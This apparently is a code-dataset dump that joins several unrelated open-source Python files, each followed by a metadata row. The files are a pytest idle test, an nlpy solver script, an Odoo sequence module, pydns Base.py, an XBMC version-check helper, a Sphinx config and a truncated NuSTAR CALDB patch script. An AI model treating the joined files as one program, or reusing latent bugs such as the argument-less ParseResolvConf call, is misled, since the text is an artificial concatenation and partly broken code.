@pytest.mark.usefixtures('generate_version_files')
def test_idle(appliance, request, scenario):
"""Runs an appliance at idle with specific roles turned on for specific amount of time. Memory
Monitor creates graphs and summary at the end of the scenario.
Polarion:
assignee: rhcf3_machine
casecomponent: CandU
initialEstimate: 1/4h
"""
from_ts = int(time.time() * 1000)
logger.debug('Scenario: {}'.format(scenario['name']))
appliance.clean_appliance()
quantifiers = {}
scenario_data = {'appliance_ip': appliance.hostname,
'appliance_name': cfme_performance['appliance']['appliance_name'],
'test_dir': 'workload-idle',
'test_name': 'Idle with {} Roles'.format(scenario['name']),
'appliance_roles': ', '.join(scenario['roles']),
'scenario': scenario}
monitor_thread = SmemMemoryMonitor(appliance.ssh_client(), scenario_data)
def cleanup_workload(from_ts, quantifiers, scenario_data):
starttime = time.time()
to_ts = int(starttime * 1000)
g_urls = get_scenario_dashboard_urls(scenario, from_ts, to_ts)
logger.debug('Started cleaning up monitoring thread.')
monitor_thread.grafana_urls = g_urls
monitor_thread.signal = False
monitor_thread.join()
add_workload_quantifiers(quantifiers, scenario_data)
timediff = time.time() - starttime
logger.info(f'Finished cleaning up monitoring thread in {timediff}')
request.addfinalizer(lambda: cleanup_workload(from_ts, quantifiers, scenario_data))
monitor_thread.start()
appliance.wait_for_miq_server_workers_started(poll_interval=2)
appliance.update_server_roles({role: True for role in scenario['roles']})
s_time = scenario['total_time']
logger.info(f'Idling appliance for {s_time}s')
time.sleep(s_time)
quantifiers['Elapsed_Time'] = s_time
logger.info('Test Ending...')
| gpl-2.0 | 702,448,374,173,108,000 | 38.681818 | 98 | 0.699504 | false |
optimizers/nlpy | nlpy/optimize/solvers/nlpy_funnel.py | 3 | 5078 | #!/usr/bin/env python
from nlpy import __version__
from nlpy.model import AmplModel
from nlpy.optimize.solvers.funnel import Funnel, LSTRFunnel, LDFPFunnel, \
StructuredLDFPFunnel
from nlpy.tools.timing import cputime
from optparse import OptionParser
import numpy
import nlpy.tools.logs
import sys, logging, os
# Create root logger.
log = logging.getLogger('funnel')
log.setLevel(logging.INFO)
fmt = logging.Formatter('%(name)-15s %(levelname)-8s %(message)s')
hndlr = logging.StreamHandler(sys.stdout)
hndlr.setFormatter(fmt)
log.addHandler(hndlr)
# Configure the solver logger.
sublogger = logging.getLogger('funnel.solver')
sublogger.setLevel(logging.INFO)
sublogger.addHandler(hndlr)
sublogger.propagate = False
def pass_to_funnel(nlp, **kwargs):
verbose = (kwargs['print_level'] == 2)
qn = kwargs.pop('quasi_newton')
t = cputime()
if qn:
funn = StructuredLDFPFunnel(nlp, logger_name='funnel.solver', **kwargs)
# funn = LDFPFunnel(nlp, logger_name='funnel.solver', **kwargs)
else:
funn = Funnel(nlp, logger_name='funnel.solver', **kwargs)
t_setup = cputime() - t # Setup time.
funn.solve() #reg=1.0e-8)
return (t_setup, funn)
usage_msg = """%prog [options] problem1 [... problemN]
where problem1 through problemN represent equality-constrained nonlinear programs."""
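# Example invocation (sketch; the .nl model names are placeholders):
#   python nlpy_funnel.py --quasi_newton --iter 200 hs006.nl hs007.nl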
# Define allowed command-line options
parser = OptionParser(usage=usage_msg, version='%prog version ' + __version__)
parser.add_option("-p", "--stop_p", action="store", type="float",
default=1.0e-5, dest="stop_p",
help="Primal stopping tolerance")
parser.add_option("-d", "--stop_d", action="store", type="float",
default=1.0e-5, dest="stop_d",
help="Dual stopping tolerance")
parser.add_option("-q", "--quasi_newton", action="store_true",
default=False, dest="quasi_newton",
help="Use LDFP approximation of Hessian")
parser.add_option("-i", "--iter", action="store", type="int", default=None,
dest="maxit", help="Specify maximum number of iterations")
parser.add_option("-o", "--print_level", action="store", type="int",
default=0, dest="print_level",
help="Print iterations detail (0, 1 or 2)")
# Parse command-line options
(options, args) = parser.parse_args()
# Translate options to input arguments.
opts = {}
if options.maxit is not None:
opts['maxit'] = options.maxit
opts['stop_p'] = options.stop_p
opts['stop_d'] = options.stop_d
opts['quasi_newton'] = options.quasi_newton
opts['print_level'] = options.print_level
# Set printing standards for arrays
numpy.set_printoptions(precision=3, linewidth=80, threshold=10, edgeitems=3)
multiple_problems = len(args) > 1
error = False
if multiple_problems:
# Define formats for output table.
hdrfmt = '%-10s %5s %5s %15s %7s %7s %6s %6s %5s'
hdr = hdrfmt % ('Name','Iter','Feval','Objective','dResid','pResid',
'Setup','Solve','Opt')
lhdr = len(hdr)
fmt = '%-10s %5d %5d %15.8e %7.1e %7.1e %6.2f %6.2f %5s'
log.info(hdr)
log.info('-' * lhdr)
# Solve each problem in turn.
for ProblemName in args:
nlp = AmplModel(ProblemName)
# Check for equality-constrained problem.
n_ineq = nlp.nlowerC + nlp.nupperC + nlp.nrangeC
if nlp.nbounds > 0 or n_ineq > 0:
msg = '%s has %d bounds and %d inequality constraints\n'
log.error(msg % (nlp.name, nlp.nbounds, n_ineq))
error = True
else:
ProblemName = os.path.basename(ProblemName)
if ProblemName[-3:] == '.nl':
ProblemName = ProblemName[:-3]
t_setup, funn = pass_to_funnel(nlp, **opts)
if multiple_problems:
log.info(fmt % (ProblemName, funn.niter, funn.nlp.feval, funn.f,
funn.dResid, funn.pResid,
t_setup, funn.tsolve, funn.optimal))
nlp.close() # Close model.
if not multiple_problems and not error:
# Output final statistics
log.info('--------------------------------')
log.info('Funnel: End of Execution')
log.info(' Problem : %-s' % ProblemName)
log.info(' Number of variables : %-d' % nlp.n)
log.info(' Number of linear constraints : %-d' % nlp.nlin)
log.info(' Number of general constraints: %-d' % (nlp.m - nlp.nlin))
log.info(' Initial/Final Objective : %-g/%-g' % (funn.f0, funn.f))
log.info(' Number of iterations : %-d' % funn.niter)
log.info(' Number of function evals : %-d' % funn.nlp.feval)
log.info(' Number of gradient evals : %-d' % funn.nlp.geval)
#log.info(' Number of Hessian evals : %-d' % funn.nlp.Heval)
log.info(' Number of Hessian matvecs : %-d' % funn.nlp.Hprod)
log.info(' Setup/Solve time : %-gs/%-gs' % (t_setup, funn.tsolve))
log.info(' Total time : %-gs' % (t_setup + funn.tsolve))
log.info('--------------------------------')
| gpl-3.0 | 617,298,200,298,347,500 | 37.180451 | 83 | 0.606144 | false |
MostlyOpen/odoo_addons | myo_document/models/document_seq.py | 1 | 3257 | # -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from openerp import api, fields, models
from datetime import *
def format_code(code_seq):
code = map(int, str(code_seq))
code_len = len(code)
while len(code) < 14:
code.insert(0, 0)
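    # append two check digits: weighted sum with weights (len(code)+1-i) mod 11;
    # remainders 0 or 1 give a check digit of 0, otherwise it is 11 - remainder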
while len(code) < 16:
n = sum([(len(code) + 1 - i) * v for i, v in enumerate(code)]) % 11
if n > 1:
f = 11 - n
else:
f = 0
code.append(f)
code_str = "%s.%s.%s.%s.%s-%s" % (str(code[0]) + str(code[1]),
str(code[2]) + str(code[3]) + str(code[4]),
str(code[5]) + str(code[6]) + str(code[7]),
str(code[8]) + str(code[9]) + str(code[10]),
str(code[11]) + str(code[12]) + str(code[13]),
str(code[14]) + str(code[15]))
if code_len <= 3:
code_form = code_str[18 - code_len:21]
elif code_len > 3 and code_len <= 6:
code_form = code_str[17 - code_len:21]
elif code_len > 6 and code_len <= 9:
code_form = code_str[16 - code_len:21]
elif code_len > 9 and code_len <= 12:
code_form = code_str[15 - code_len:21]
elif code_len > 12 and code_len <= 14:
code_form = code_str[14 - code_len:21]
return code_form
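# Sketch of standalone use (hypothetical value): format_code(123) left-pads the
# sequence to 14 digits, appends two weighted mod-11 check digits and returns the
# trailing significant part of the dotted code, as used for the 'code' field below.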
class Document(models.Model):
_inherit = 'myo.document'
code = fields.Char(string='Code', required=False, default=False,
help='Use "/" to get an automatic new Document Code.')
@api.model
def create(self, values):
if 'code' not in values or ('code' in values and values['code'] == '/'):
code_seq = self.pool.get('ir.sequence').next_by_code(self._cr, self._uid, 'myo.document.code')
values['code'] = format_code(code_seq)
return super(Document, self).create(values)
@api.multi
def write(self, values):
if 'code' in values and values['code'] == '/':
code_seq = self.pool.get('ir.sequence').next_by_code(self._cr, self._uid, 'myo.document.code')
values['code'] = format_code(code_seq)
return super(Document, self).write(values)
@api.one
def copy(self, default=None):
default = dict(default or {})
default.update({'code': '/', })
return super(Document, self).copy(default)
| agpl-3.0 | 334,841,388,898,515,650 | 39.209877 | 106 | 0.543138 | false |
sanghinitin/golismero | tools/theHarvester/discovery/DNS/Base.py | 24 | 11574 | """
$Id: Base.py,v 1.12.2.4 2007/05/22 20:28:31 customdesigned Exp $
This file is part of the pydns project.
Homepage: http://pydns.sourceforge.net
This code is covered by the standard Python License.
Base functionality. Request and Response classes, that sort of thing.
"""
import socket, string, types, time
import Type, Class, Opcode
import asyncore
class DNSError(Exception): pass
defaults = { 'protocol':'udp', 'port':53, 'opcode':Opcode.QUERY,
'qtype':Type.A, 'rd':1, 'timing':1, 'timeout': 30 }
defaults['server'] = []
def ParseResolvConf(resolv_path):
global defaults
    try:
        lines = open(resolv_path).readlines()
    except:
        print "error in path " + resolv_path
        return
for line in lines:
line = string.strip(line)
if not line or line[0] == ';' or line[0] == '#':
continue
fields = string.split(line)
if len(fields) < 2:
continue
if fields[0] == 'domain' and len(fields) > 1:
defaults['domain'] = fields[1]
if fields[0] == 'search':
pass
if fields[0] == 'options':
pass
if fields[0] == 'sortlist':
pass
if fields[0] == 'nameserver':
defaults['server'].append(fields[1])
def DiscoverNameServers():
import sys
if sys.platform in ('win32', 'nt'):
import win32dns
defaults['server'] = win32dns.RegistryResolve()
else:
return ParseResolvConf()
class DnsRequest:
""" high level Request object """
def __init__(self, *name, **args):
self.donefunc = None
self.async = None
self.defaults = {}
self.argparse(name, args)
self.defaults = self.args
def argparse(self, name, args):
if not name and self.defaults.has_key('name'):
args['name'] = self.defaults['name']
if type(name) is types.StringType:
args['name'] = name
else:
if len(name) == 1:
if name[0]:
args['name'] = name[0]
for i in defaults.keys():
if not args.has_key(i):
if self.defaults.has_key(i):
args[i] = self.defaults[i]
else:
args[i] = defaults[i]
if type(args['server']) == types.StringType:
args['server'] = [args['server']]
self.args = args
def socketInit(self, a, b):
self.s = socket.socket(a, b)
def processUDPReply(self):
import time, select
if self.args['timeout'] > 0:
r, w, e = select.select([self.s], [], [], self.args['timeout'])
if not len(r):
raise DNSError, 'Timeout'
self.reply = self.s.recv(1024)
self.time_finish = time.time()
self.args['server'] = self.ns
return self.processReply()
def processTCPReply(self):
import time, Lib
self.f = self.s.makefile('r')
header = self.f.read(2)
if len(header) < 2:
raise DNSError, 'EOF'
count = Lib.unpack16bit(header)
self.reply = self.f.read(count)
if len(self.reply) != count:
raise DNSError, 'incomplete reply'
self.time_finish = time.time()
self.args['server'] = self.ns
return self.processReply()
def processReply(self):
import Lib
self.args['elapsed'] = (self.time_finish - self.time_start) * 1000
u = Lib.Munpacker(self.reply)
r = Lib.DnsResult(u, self.args)
r.args = self.args
#self.args=None # mark this DnsRequest object as used.
return r
#### TODO TODO TODO ####
# if protocol == 'tcp' and qtype == Type.AXFR:
# while 1:
# header = f.read(2)
# if len(header) < 2:
# print '========== EOF =========='
# break
# count = Lib.unpack16bit(header)
# if not count:
# print '========== ZERO COUNT =========='
# break
# print '========== NEXT =========='
# reply = f.read(count)
# if len(reply) != count:
# print '*** Incomplete reply ***'
# break
# u = Lib.Munpacker(reply)
# Lib.dumpM(u)
def conn(self):
self.s.connect((self.ns, self.port))
def req(self, *name, **args):
" needs a refactoring "
import time, Lib
self.argparse(name, args)
#if not self.args:
# raise DNSError,'reinitialize request before reuse'
protocol = self.args['protocol']
self.port = self.args['port']
opcode = self.args['opcode']
rd = self.args['rd']
server = self.args['server']
if type(self.args['qtype']) == types.StringType:
try:
qtype = getattr(Type, string.upper(self.args['qtype']))
except AttributeError:
raise DNSError, 'unknown query type'
else:
qtype = self.args['qtype']
if not self.args.has_key('name'):
print self.args
raise DNSError, 'nothing to lookup'
qname = self.args['name']
if qtype == Type.AXFR:
print 'Query type AXFR, protocol forced to TCP'
protocol = 'tcp'
#print 'QTYPE %d(%s)' % (qtype, Type.typestr(qtype))
m = Lib.Mpacker()
# jesus. keywords and default args would be good. TODO.
m.addHeader(0,
0, opcode, 0, 0, rd, 0, 0, 0,
1, 0, 0, 0)
m.addQuestion(qname, qtype, Class.IN)
self.request = m.getbuf()
try:
if protocol == 'udp':
self.sendUDPRequest(server)
else:
self.sendTCPRequest(server)
except socket.error, reason:
raise DNSError, reason
if self.async:
return None
else:
return self.response
def sendUDPRequest(self, server):
"refactor me"
self.response = None
self.socketInit(socket.AF_INET, socket.SOCK_DGRAM)
for self.ns in server:
try:
# TODO. Handle timeouts &c correctly (RFC)
#self.s.connect((self.ns, self.port))
self.conn()
self.time_start = time.time()
if not self.async:
self.s.send(self.request)
self.response = self.processUDPReply()
            except socket.error:
continue
break
if not self.response:
if not self.async:
raise DNSError, 'no working nameservers found'
def sendTCPRequest(self, server):
" do the work of sending a TCP request "
import time, Lib
self.response = None
for self.ns in server:
try:
self.socketInit(socket.AF_INET, socket.SOCK_STREAM)
self.time_start = time.time()
self.conn()
self.s.send(Lib.pack16bit(len(self.request)) + self.request)
self.s.shutdown(1)
self.response = self.processTCPReply()
except socket.error:
continue
break
if not self.response:
raise DNSError, 'no working nameservers found'
#class DnsAsyncRequest(DnsRequest):
class DnsAsyncRequest(DnsRequest, asyncore.dispatcher_with_send):
" an asynchronous request object. out of date, probably broken "
def __init__(self, *name, **args):
DnsRequest.__init__(self, *name, **args)
# XXX todo
if args.has_key('done') and args['done']:
self.donefunc = args['done']
else:
self.donefunc = self.showResult
#self.realinit(name,args) # XXX todo
self.async = 1
def conn(self):
import time
self.connect((self.ns, self.port))
self.time_start = time.time()
if self.args.has_key('start') and self.args['start']:
asyncore.dispatcher.go(self)
def socketInit(self, a, b):
self.create_socket(a, b)
asyncore.dispatcher.__init__(self)
self.s = self
def handle_read(self):
if self.args['protocol'] == 'udp':
self.response = self.processUDPReply()
if self.donefunc:
apply(self.donefunc, (self,))
def handle_connect(self):
self.send(self.request)
def handle_write(self):
pass
def showResult(self, *s):
self.response.show()
#
# $Log: Base.py,v $
# Revision 1.12.2.4 2007/05/22 20:28:31 customdesigned
# Missing import Lib
#
# Revision 1.12.2.3 2007/05/22 20:25:52 customdesigned
# Use socket.inetntoa,inetaton.
#
# Revision 1.12.2.2 2007/05/22 20:21:46 customdesigned
# Trap socket error
#
# Revision 1.12.2.1 2007/05/22 20:19:35 customdesigned
# Skip bogus but non-empty lines in resolv.conf
#
# Revision 1.12 2002/04/23 06:04:27 anthonybaxter
# attempt to refactor the DNSRequest.req method a little. after doing a bit
# of this, I've decided to bite the bullet and just rewrite the puppy. will
# be checkin in some design notes, then unit tests and then writing the sod.
#
# Revision 1.11 2002/03/19 13:05:02 anthonybaxter
# converted to class based exceptions (there goes the python1.4 compatibility :)
#
# removed a quite gross use of 'eval()'.
#
# Revision 1.10 2002/03/19 12:41:33 anthonybaxter
# tabnannied and reindented everything. 4 space indent, no tabs.
# yay.
#
# Revision 1.9 2002/03/19 12:26:13 anthonybaxter
# death to leading tabs.
#
# Revision 1.8 2002/03/19 10:30:33 anthonybaxter
# first round of major bits and pieces. The major stuff here (summarised
# from my local, off-net CVS server :/ this will cause some oddities with
# the
#
# tests/testPackers.py:
# a large slab of unit tests for the packer and unpacker code in DNS.Lib
#
# DNS/Lib.py:
# placeholder for addSRV.
# added 'klass' to addA, make it the same as the other A* records.
# made addTXT check for being passed a string, turn it into a length 1 list.
# explicitly check for adding a string of length > 255 (prohibited).
# a bunch of cleanups from a first pass with pychecker
# new code for pack/unpack. the bitwise stuff uses struct, for a smallish
# (disappointly small, actually) improvement, while addr2bin is much
# much faster now.
#
# DNS/Base.py:
# added DiscoverNameServers. This automatically does the right thing
# on unix/ win32. No idea how MacOS handles this. *sigh*
# Incompatible change: Don't use ParseResolvConf on non-unix, use this
# function, instead!
# a bunch of cleanups from a first pass with pychecker
#
# Revision 1.5 2001/08/09 09:22:28 anthonybaxter
# added what I hope is win32 resolver lookup support. I'll need to try
# and figure out how to get the CVS checkout onto my windows machine to
# make sure it works (wow, doing something other than games on the
# windows machine :)
#
# Code from [email protected]
# win32dns.py from
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/66260
#
# Really, ParseResolvConf() should be renamed "FindNameServers" or
# some such.
#
# Revision 1.4 2001/08/09 09:08:55 anthonybaxter
# added identifying header to top of each file
#
# Revision 1.3 2001/07/19 07:20:12 anthony
# Handle blank resolv.conf lines.
# Patch from Bastian Kleineidam
#
# Revision 1.2 2001/07/19 06:57:07 anthony
# cvs keywords added
#
#
| gpl-2.0 | -6,877,081,800,795,135,000 | 33.242604 | 80 | 0.574218 | false |
station7/xbmc | addons/service.xbmc.versioncheck/lib/common.py | 82 | 6948 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Team-XBMC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import os
import unicodedata
import xbmc
import xbmcaddon
import xbmcgui
import xbmcvfs
ADDON = xbmcaddon.Addon()
ADDONVERSION = ADDON.getAddonInfo('version')
ADDONNAME = ADDON.getAddonInfo('name')
ADDONPATH = ADDON.getAddonInfo('path').decode('utf-8')
ADDONPROFILE = xbmc.translatePath( ADDON.getAddonInfo('profile') ).decode('utf-8')
ICON = ADDON.getAddonInfo('icon')
monitor = xbmc.Monitor()
# Fixes unicode problems
def string_unicode(text, encoding='utf-8'):
try:
text = unicode( text, encoding )
except:
pass
return text
def normalize_string(text):
try:
text = unicodedata.normalize('NFKD', string_unicode(text)).encode('ascii', 'ignore')
except:
pass
return text
def localise(id):
string = normalize_string(ADDON.getLocalizedString(id))
return string
def log(txt):
if isinstance (txt,str):
txt = txt.decode("utf-8")
message = u'%s: %s' % ("Version Check", txt)
xbmc.log(msg=message.encode("utf-8"), level=xbmc.LOGDEBUG)
def get_password_from_user():
keyboard = xbmc.Keyboard("", ADDONNAME + "," +localise(32022), True)
keyboard.doModal()
if (keyboard.isConfirmed()):
pwd = keyboard.getText()
return pwd
def message_upgrade_success():
xbmc.executebuiltin("XBMC.Notification(%s, %s, %d, %s)" %(ADDONNAME,
localise(32013),
15000,
ICON))
def message_restart():
if dialog_yesno(32014):
xbmc.executebuiltin("RestartApp")
def dialog_yesno(line1 = 0, line2 = 0):
return xbmcgui.Dialog().yesno(ADDONNAME,
localise(line1),
localise(line2))
def upgrade_message(msg, oldversion, upgrade, msg_current, msg_available):
wait_for_end_of_video()
if ADDON.getSetting("lastnotified_version") < ADDONVERSION:
xbmcgui.Dialog().ok(ADDONNAME,
localise(msg),
localise(32001),
localise(32002))
#ADDON.setSetting("lastnotified_version", ADDONVERSION)
else:
log("Already notified one time for upgrading.")
def upgrade_message2( version_installed, version_available, version_stable, oldversion, upgrade,):
# shorten releasecandidate to rc
if version_installed['tag'] == 'releasecandidate':
version_installed['tag'] = 'rc'
if version_available['tag'] == 'releasecandidate':
version_available['tag'] = 'rc'
# convert json-rpc result to strings for usage
msg_current = '%i.%i %s%s' %(version_installed['major'],
version_installed['minor'],
version_installed['tag'],
version_installed.get('tagversion',''))
msg_available = version_available['major'] + '.' + version_available['minor'] + ' ' + version_available['tag'] + version_available.get('tagversion','')
msg_stable = version_stable['major'] + '.' + version_stable['minor'] + ' ' + version_stable['tag'] + version_stable.get('tagversion','')
msg = localise(32034) %(msg_current, msg_available)
wait_for_end_of_video()
# hack: convert current version number to stable string
# so users don't get notified again. remove in future
if ADDON.getSetting("lastnotified_version") == '0.1.24':
ADDON.setSetting("lastnotified_stable", msg_stable)
# Show different dialogs depending if there's a newer stable available.
# Also split them between xbmc and kodi notifications to reduce possible confusion.
# People will find out once they visit the website.
# For stable only notify once and when there's a newer stable available.
# Ignore any add-on updates as those only count for != stable
if oldversion == 'stable' and ADDON.getSetting("lastnotified_stable") != msg_stable:
if xbmcaddon.Addon('xbmc.addon').getAddonInfo('version') < "13.9.0":
xbmcgui.Dialog().ok(ADDONNAME,
msg,
localise(32030),
localise(32031))
else:
xbmcgui.Dialog().ok(ADDONNAME,
msg,
localise(32032),
localise(32033))
ADDON.setSetting("lastnotified_stable", msg_stable)
elif oldversion != 'stable' and ADDON.getSetting("lastnotified_version") != msg_available:
if xbmcaddon.Addon('xbmc.addon').getAddonInfo('version') < "13.9.0":
# point them to xbmc.org
xbmcgui.Dialog().ok(ADDONNAME,
msg,
localise(32035),
localise(32031))
else:
#use kodi.tv
xbmcgui.Dialog().ok(ADDONNAME,
msg,
localise(32035),
localise(32033))
# older skins don't support a text field in the OK dialog.
# let's use split lines for now. see code above.
'''
msg = localise(32034) %(msg_current, msg_available)
if oldversion == 'stable':
msg = msg + ' ' + localise(32030)
else:
msg = msg + ' ' + localise(32035)
msg = msg + ' ' + localise(32031)
xbmcgui.Dialog().ok(ADDONNAME, msg)
#ADDON.setSetting("lastnotified_version", ADDONVERSION)
'''
ADDON.setSetting("lastnotified_version", msg_available)
else:
log("Already notified one time for upgrading.")
def wait_for_end_of_video():
# Don't show notify while watching a video
while xbmc.Player().isPlayingVideo() and not monitor.abortRequested():
if monitor.waitForAbort(1):
# Abort was requested while waiting. We should exit
break
i = 0
while i < 10 and not monitor.abortRequested():
if monitor.waitForAbort(1):
# Abort was requested while waiting. We should exit
break
i += 1 | gpl-2.0 | -4,388,351,131,310,801,400 | 38.482955 | 155 | 0.581894 | false |
sbesson/openmicroscopy | docs/sphinx-api/conf.py | 6 | 4384 | # -*- coding: utf-8 -*-
#
# OMERO.py API documentation build configuration file, created by
# sphinx-quickstart on Mon Jul 23 12:22:32 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import datetime
import sys, os
import os.path
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(os.path.join('..','..','dist','lib','python')))
sys.path.insert(0, os.path.abspath(os.path.join('..','..','dist','lib','python','omeroweb')))
os.environ['DJANGO_SETTINGS_MODULE'] = 'omeroweb.settings'
author = u'The Open Microscopy Environment'
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.autosummary', 'sphinx.ext.todo', 'sphinx.ext.coverage']
autodoc_default_flags = ['members', 'undoc-members', 'private-members']
# General information about the project.
project = u'OMERO.py API'
targetname = 'OmeroPyAPI'
title = project + u' Documentation'
master_doc = 'index'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
version = os.environ.get('OMERO_RELEASE', 'UNKNOWN')
release = os.environ.get('OMERO_RELEASE', 'UNKNOWN')
# -- Options for HTML output ---------------------------------------------------
html_theme = 'api_theme'
# The suffix of source filenames.
source_suffix = '.rst'
# Output file base name for HTML help builder.
htmlhelp_basename = project+ ' doc'
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['../sphinx/common/themes', 'themes']
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', targetname + '.tex', title, author, 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'omeropyapi', title, author, 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', targetname, title, author, targetname,
'One line description of project.', 'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
| gpl-2.0 | 8,927,459,474,815,943,000 | 31.962406 | 103 | 0.681569 | false |
mfacorcoran/pycaldb | nustar_caldb/nustar_caldb_patch.py | 1 | 9035 | def patch_nustar_caldb(version,
nupatchserver = "hassif.caltech.edu",
nupatchworkdir = "/pub/nustar/pipeline",
caldb = "/FTP/caldb",
caldbstage = "/FTP/caldb/staging",
ck_file_exists='True'):
"""
CALLING SEQUENCE:
patch_nustar_caldb(version,
nupatchserver = "hassif.caltech.edu",
nupatchworkdir = "/pub/nustar/pipeline",
caldb = "/FTP/caldb",
caldbstage = "/FTP/caldb/staging")
The following is from /web_chroot/FTP/.caldb_staging/data/nustar/README_rev1.txt
20131028
========
installing patch version 20131007 - STEPS:
a) first created a full version of the existing nustar caldb in the
/FTP/caldb/data/nustar in the nustar/versions are via rsync:
[caldbmgr]: pwd
/web_chroot/FTP/.caldb_staging/data/nustar/versions
[caldbmgr]: mkdir 20131007
[caldbmgr]: cd 20131007
[caldbmgr]: rsync -avz 20130509/CALDB/data/nustar/fpm/bcf .
[caldbmgr]: rsync -avz 20130509/CALDB/data/nustar/fpm/cpf .
[caldbmgr]: rsync -avz 20130509/CALDB/data/nustar/fpm/index .
b) wget the patch (using the location given in Brian Grefenstette's e-mail):
[caldbmgr]: cd /FTP/caldb/staging/data/nustar/versions/20131007/
[caldbmgr]: wget ftp://hassif.srl.caltech.edu/pub/nustar/pipeline/20131007/NUSTARCALDB_patch20131007.tgz
c) Untar the patch:
[caldbmgr]: pwd
/web_chroot/FTP/.caldb_staging/data/nustar/versions/20131007
[caldbmgr]: ls
fpm NUSTARCALDB_patch20131007.tgz
[caldbmgr]: tar -zxvf NUSTARCALDB_patch20131007.tgz
fpm/caldb.indx
fpm/index/caldb.indx20131007
fpm/bcf/arf/nuA20100101v006.arf
fpm/bcf/arf/nuB20100101v006.arf
... stuff deleted ...
fpm/bcf/instrument/nuAhkrange05_20100101v005.fits
fpm/bcf/instrument/nuAhkrange04_20100101v005.fits
fpm/bcf/instrument/nuAhkrange03_20100101v005.fits
fpm/bcf/instrument/nuAhkrange02_20100101v005.fits
    d) then link the (now full) 20131007 version to staging/data/nustar/fpm:
[caldbmgr]: pwd
/web_chroot/FTP/.caldb_staging/data/nustar
[caldbmgr]: ln -nfs versions/20131007/fpm .
[caldbmgr]: ls -l
total 12
lrwxrwxrwx 1 caldbmgr caldb 21 Oct 28 15:31 fpm -> versions/20131007/fpm
-rw-r--r-- 1 caldbmgr caldb 1909 Oct 28 15:27 README.txt
drwxr-xr-x 2 caldbmgr caldb 4096 Oct 28 15:09 to_ingest
drwxr-xr-x 7 caldbmgr caldb_stage 4096 Oct 28 15:14 versions
    e) from Brian's e-mail list of new files in the patch, created caldb_update_nustar_20131007.txt in the "to_ingest" subdirectory:
[caldbmgr]: pwd
/web_chroot/FTP/.caldb_staging/data/nustar/to_ingest
[caldbmgr]: ls -l
total 16
-rw-r--r-- 1 caldbmgr caldb 8839 Aug 14 11:27 caldb_update_nustar_20130509.txt
-rw-r--r-- 1 caldbmgr caldb 1636 Oct 28 15:09 caldb_update_nustar_20131007.txt
lrwxrwxrwx 1 caldbmgr caldb 32 Aug 14 11:02 caldb_update.txt -> caldb_update_nustar_20130509.txt
    f) to ingest the data (as in other missions) run /web_chroot/FTP/caldb/local/scripts/DATA_DELIVERIES/nustar_caldbupdate.csh
:param version: string in 'YYYYMMDD' format, from nustar patch notification (from BG)
:param nupatchworkdir: URL of directory where patch tar file is located, from BG
:param caldb: location where the full NuSTAR caldb is stored
:param caldbstage: location of caldb staging area
:return:
"""
import os
import ftputil
import tarfile
import datetime
import shutil
from pycaldb import ck_file_existence
from astropy.io import fits as pyfits
#
# create patch install directory
#
versiondir=caldbstage+"/data/nustar/versions/"+version.strip().lower()
patchinstalldir = versiondir
if os.path.isdir(versiondir):
ans = raw_input("{0} exists; Do you want to remove it (Y/n)? ".format(versiondir))
try:
            if ans.upper().strip()[0] != "N":
shutil.rmtree(versiondir)
print("Creating clean {0} directory".format(patchinstalldir))
os.makedirs(patchinstalldir)
except IndexError: # user hit <CR> generating an empty string
shutil.rmtree(versiondir)
print("Creating clean {0} directory".format(patchinstalldir))
os.makedirs(patchinstalldir)
else:
